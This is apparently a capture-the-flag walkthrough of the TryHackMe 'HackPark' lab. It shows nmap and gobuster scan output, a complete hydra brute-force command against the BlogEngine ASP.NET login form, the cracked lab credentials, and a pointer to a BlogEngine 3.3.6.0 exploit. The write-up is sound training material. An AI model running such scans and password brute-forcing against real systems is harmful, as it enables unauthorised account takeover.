https://tryhackme.com/room/hackpark
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-title: hackpark | hackpark amusements
|_http-server-header: Microsoft-IIS/8.5
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2022-07-22T04:19:27+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2022-07-21T04:17:06
|_Not valid after: 2023-01-20T04:17:06
|_ssl-date: 2022-07-22T04:19:30+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://10.10.46.106:80/> -w /usr/share/wordlists/dirb/common.txt -q -t 200
/account (Status: 301) [Size: 154] [--> <http://10.10.46.106:80/account/>]
/Admin (Status: 302) [Size: 172] [--> <http://10.10.46.106/Account/login.aspx?ReturnURL=/Admin>]
/ADMIN (Status: 302) [Size: 172] [--> <http://10.10.46.106/Account/login.aspx?ReturnURL=/ADMIN>]
/admin (Status: 302) [Size: 172] [--> <http://10.10.46.106/Account/login.aspx?ReturnURL=/admin>]
/Archive (Status: 200) [Size: 8312]
/aspnet_client (Status: 301) [Size: 160] [--> <http://10.10.46.106:80/aspnet_client/>]
/aux (Status: 500) [Size: 1763]
/Blog (Status: 500) [Size: 1208]
/blog (Status: 500) [Size: 1208]
/archives (Status: 200) [Size: 8313]
/archive (Status: 200) [Size: 8312]
/com2 (Status: 500) [Size: 1763]
/com3 (Status: 500) [Size: 1763]
/com1 (Status: 500) [Size: 1763]
/con (Status: 500) [Size: 1763]
/contact (Status: 200) [Size: 9922]
/contact-form (Status: 200) [Size: 9927]
/contact_bean (Status: 200) [Size: 9927]
/contact_us (Status: 200) [Size: 9925]
/Contact (Status: 200) [Size: 9922]
/contactinfo (Status: 200) [Size: 9926]
/contacts (Status: 200) [Size: 9923]
/contactus (Status: 200) [Size: 9924]
/contacto (Status: 200) [Size: 9923]
/contact-us (Status: 200) [Size: 9925]
/Content (Status: 301) [Size: 154] [--> <http://10.10.46.106:80/Content/>]
/content (Status: 301) [Size: 154] [--> <http://10.10.46.106:80/content/>]
/ContactUs (Status: 200) [Size: 9924]
/custom (Status: 301) [Size: 153] [--> <http://10.10.46.106:80/custom/>]
/default_logo (Status: 500) [Size: 1763]
/default_image (Status: 500) [Size: 1763]
/Default (Status: 500) [Size: 1763]
/default (Status: 500) [Size: 1763]
/default_page (Status: 500) [Size: 1763]
/default_icon (Status: 500) [Size: 1763]
/defaults (Status: 500) [Size: 1763]
/default_pages (Status: 500) [Size: 1763]
/fonts (Status: 301) [Size: 152] [--> <http://10.10.46.106:80/fonts/>]
/lpt2 (Status: 500) [Size: 1763]
/lpt1 (Status: 500) [Size: 1763]
/nul (Status: 500) [Size: 1763]
/prn (Status: 500) [Size: 1763]
/robots.txt (Status: 200) [Size: 303]
/scripts (Status: 301) [Size: 154] [--> <http://10.10.46.106:80/scripts/>]
/Scripts (Status: 301) [Size: 154] [--> <http://10.10.46.106:80/Scripts/>]
/Search (Status: 200) [Size: 8394]
/search_results (Status: 200) [Size: 8402]
/search-results (Status: 200) [Size: 8402]
/searchresults (Status: 200) [Size: 8401]
/setup (Status: 302) [Size: 174] [--> <http://10.10.46.106/Account/login.aspx?ReturnUrl=%2fsetup>]
/search (Status: 200) [Size: 8394]
/search_result (Status: 200) [Size: 8401]
/searchurl (Status: 200) [Size: 8397]
/searchnx (Status: 200) [Size: 8396]
As the hint says the user name is admin and given the following command:
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
After some fill and plug this is our command to brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.46.106 http-post-form "/Account/login.aspx:__VIEWSTATE=egYsj6iXHr7jPxSEBMZxFte7PIFCkO7MQ7B0is1XKP5YVIoxXAOy0JsaC5TrDNCrvtghp1Rff4%2BJYnVziNqfXUxKeUniShOv91MA4gMucjQZbLe3ZP89eGZAl9fR2ILCdW0zqbq%2B3L7gV4MsCDNO%2FQ4EATxLuqzJpCX5KpBT%2Bx0U9nbT&__EVENTVALIDATION=O9TGZHlWJqCcqw%2BXQTkrcMNWSrefUcB37%2F8LhNHXwr%2BSTU%2F51HUum7E2N4AJlIq7THxNa2P%2F7U3AOv9LBIArjirFDgQ8s0HuYuOOoDt%2FAvjILCTjd3jAhOmqkolzqn%2BUKl4MsQ5qxW%2BZO24w9SH8W6ZzIZTtF5Vgj3zOe9AeANfn4jJa&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
The http-post-form was getting from burp suite
Where we get the result
[80][http-post-form] host: 10.10.46.106 login: admin password: 1qaz2wsx
After logging in and look around we found the Blog Engine Version 3.3.6.0
A quick Google search and we found the exploit
